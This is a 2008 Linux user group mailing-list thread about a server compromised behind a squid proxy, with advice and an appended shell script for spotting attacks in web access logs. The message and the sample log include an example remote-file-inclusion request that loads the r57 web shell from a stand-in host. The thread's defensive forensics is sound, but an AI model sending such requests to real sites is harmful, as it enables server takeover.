Michael Lazin on 4 Nov 2008 17:44:32 -0800



Re: [PLUG] weird process?


By the way, if you find any files that you don't recognize, you can grep for their time stamp.

On Tue, Nov 4, 2008 at 8:39 PM, Michael Lazin <microlaser@gmail.com> wrote:
Morpheus fucking scanner is pretty common in access logs; I see it a lot.  If it is a 200 it means a successful connection, but of course if you have a custom 404 page it may just be a successful connection to a 404 page.  The most common exploits look like GET or POST script.php?var=http://evil.code.html/r57.txt or the like.  You can grep for ="".  If it is a 200 and you have no custom 404, this was most likely a successful RFI attack.  A GET to a different file is usually not an attack unless it contains that =http string showing file inclusion.  Code injection attacks will most likely show up as a POST from a suspicious IP.  Try using grep with awk to examine all the IPs that have POST data associated with them in the logs, something like:

zgrep POST access.log* | grep " 200 " | awk '{print $1}' | sort -u

When searching for remote file inclusion try something like:

for i in 32 33 34.* current; do zgrep =http access.log.$i* | grep " 200 " | grep -v google | grep -v yahoo | less; done

to look for the =http string in the access logs from the past couple weeks.

On Tue, Nov 4, 2008 at 8:24 PM, Eric <eric@lucii.org> wrote:
Ah, I believe I see:  You're saying the box is compromised in some other
way and squid is the tool they used _after_ they broke in to serve up
their mischief.
That makes sense.

Thanks,

Eric



James Barrett wrote:
> If squid were configured correctly, and there are no publicly known
> squid vulnerabilities for the version being run (and the version being
> run was compiled without any custom patches), it is probably safe to
> say that the point of unauthorized entry was not squid.  Think about
> it this way, if someone discovered an unpublicized exploit and if they
> were out to do mischief, would they start by picking some gateway
> hooked up to a T1?  No, they would probably pick something else with
> which they could wreak a gigantic amount of havoc.
>
> My uneducated guess is that whoever got in did so by some other means.
>   They then took the opportunity to use squid to their advantage after
> the fact.  Unless of course the squid being run was in fact
> vulnerable...
>
> --
> Jim
>
> On Tue, Nov 4, 2008 at 6:16 PM, Eric<eric@lucii.org>  wrote:
>
>> Well, I'm not sure.  Stopping squid stops the incessant network traffic
>> that saturates the T1 line but nobody is sure yet WHY.
>> The network wizards are working on it so I stay in the background
>> working on other things :-)
>> I'll post details as available - when I know them.
>>
>>
>> Eric
>>
>> George A. Theall wrote:
>>
>>> On Tue, Nov 04, 2008 at 12:55:44PM -0500, Eric wrote:
>>>
>>>
>>>
>>>> Turns out the system has been compromised (via a squid exploit we're
>>>> thinking)
>>>>
>>>>
>>> Just curious...  Is this a 0-day or a known issue? Scanning through
>>> various vulnerability databases, I only see denial of service issues
>>> affecting Squid itself, at least going back through 2007.
>>>
>>> George
>>>
>>>
>> --
>> #  Eric Lucas
>> #
>> #                "Oh, I have slipped the surly bond of earth
>> #                 And danced the skies on laughter-silvered wings...
>> #                                        -- John Gillespie Magee Jr
>>
>> ___________________________________________________________________________
>> Philadelphia Linux Users Group         --        http://www.phillylinux.org
>> Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
>> General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
>>
>>

--
#  Eric Lucas
#
#                "Oh, I have slipped the surly bond of earth
#                 And danced the skies on laughter-silvered wings...
#                                        -- John Gillespie Magee Jr




--
Michael Lazin
To gar auto estin noein te kai enai



--
Michael Lazin
To gar auto estin noein te kai enai
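The log-sifting approach Michael describes in the quoted message (POSTs that got a 200, =http strings pointing at remote files, and grepping by time stamp) as an added, self-contained example; this is not code from the thread. It assumes Apache "combined" log format and builds a small constructed access log in a temp file so it runs offline. The one refinement over the one-liners above is that it checks the status field itself (awk field $9) instead of grep " 200 ", because the loose pattern also matches a response size of 200 bytes, as the constructed 404 line shows.

```shell
#!/bin/sh
# Constructed sample access log in Apache combined format (not from the thread).
# Fields: ip ident user [date tz] "method path proto" status size "referrer" "agent"
LOGFILE="${TMPDIR:-/tmp}/plug_example_access.log"
cat > "$LOGFILE" <<'EOF'
10.0.0.5 - - [04/Nov/2008:20:11:02 -0500] "GET /index.php?page=http://example.invalid/r57.txt HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
10.0.0.5 - - [04/Nov/2008:20:11:09 -0500] "POST /admin/upload.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
192.0.2.10 - - [04/Nov/2008:20:12:40 -0500] "GET /index.php?page=http://example.invalid/r57.txt HTTP/1.1" 404 200 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Nov/2008:20:13:01 -0500] "GET /about.html HTTP/1.1" 200 4410 "http://www.google.com/search?q=plug" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2008:20:14:22 -0500] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Nov/2008:20:15:00 -0500] "GET /news.php?id=http://www.yahoo.com/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF

# Source IPs whose POST requests were answered with 200.
# $6 is the quoted method ("POST), $9 is the HTTP status.
post_200_ips() {
    awk '$6 == "\"POST" && $9 == "200" {print $1}' "$1" | sort -u
}

# Requests whose query string pulls in a remote URL (=http) and got a 200,
# dropping lines that merely mention google or yahoo (referrers, search links).
rfi_hits() {
    awk '$7 ~ /=http/ && $9 == "200"' "$1" | grep -v -e google -e yahoo
}

# Requests logged at a given time prefix, e.g. the mtime of an unfamiliar file
# written as 04/Nov/2008:20:11 (day/month/year:hour[:minute]).
hits_at() {
    grep -F "[$2" "$1"
}

# The loose pattern from the one-liners versus a field-aware status check.
naive_200_count()  { grep -c ' 200 ' "$1"; }
status_200_count() { awk '$9 == "200"' "$1" | wc -l | tr -d ' '; }

echo "IPs with POST -> 200:"
post_200_ips "$LOGFILE"
echo "Possible RFI hits:"
rfi_hits "$LOGFILE"
echo "Requests around 04/Nov/2008:20:11:"
hits_at "$LOGFILE" 04/Nov/2008:20:11
echo "grep ' 200 ' count: $(naive_200_count "$LOGFILE"), status==200 count: $(status_200_count "$LOGFILE")"
```

On a live box the same functions work on rotated logs by feeding them `zcat access.log.*.gz` output through a pipe instead of a file name; the time-stamp prefix for hits_at can be taken from `ls -l --full-time` or `stat` on the unfamiliar file.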